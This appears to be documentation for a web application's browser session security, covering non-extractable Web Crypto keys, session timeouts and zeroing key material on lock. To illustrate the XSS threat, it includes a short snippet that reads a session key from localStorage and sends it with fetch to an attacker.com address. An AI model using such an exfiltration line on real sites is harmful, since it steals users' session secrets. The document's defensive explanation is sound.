
Session Management

Browser sessions and XSS protection with non-extractable keys


Session Key Architecture

Browser sessions rely on the Web Crypto API's non-extractable keys for XSS protection: the key material stays inside the browser's key store and script can only use the key handle, never read the key bytes.

XSS Protection

Traditional localStorage-based session storage is vulnerable to XSS attacks:

// XSS attack can steal localStorage
const stolen = localStorage.getItem('session_key');
fetch('https://attacker.com/steal', { body: stolen });

With non-extractable keys:

// Even with code execution, export fails
const key = await getSessionKeyFromIndexedDB();
await crypto.subtle.exportKey('raw', key);
// Throws: InvalidAccessError: key is not extractable

Session Lifecycle

Session Configuration

interface SecuritySettings {
  sessionTimeoutMs: number;      // Default: 30 minutes
  strictSessionLocking: boolean; // Clear on page hide
}

Memory Clearing

On session lock:

// Module-level state (declared elsewhere): decryptedKeys, chatKeyCache, e2eeState
async function lockSession() {
  // Zero in-memory key material; sodium.memzero overwrites the Uint8Array in place
  if (decryptedKeys) {
    sodium.memzero(decryptedKeys.masterKey);
    sodium.memzero(decryptedKeys.privateKey);
    decryptedKeys = null;
  }

  // Zero and drop every cached per-chat key
  chatKeyCache.forEach((key) => sodium.memzero(key));
  chatKeyCache.clear();

  // Remove the persisted session from IndexedDB (async, hence the async function)
  await clearIndexedDBSession();

  // Mark the session locked
  e2eeState = 'locked';
}

Security Guarantees

Threat                  Protection
XSS key theft           Non-extractable Web Crypto keys
Session hijacking       Keys bound to browser instance
Idle session exposure   Automatic timeout after inactivity
Memory dumping          Keys zeroed on lock
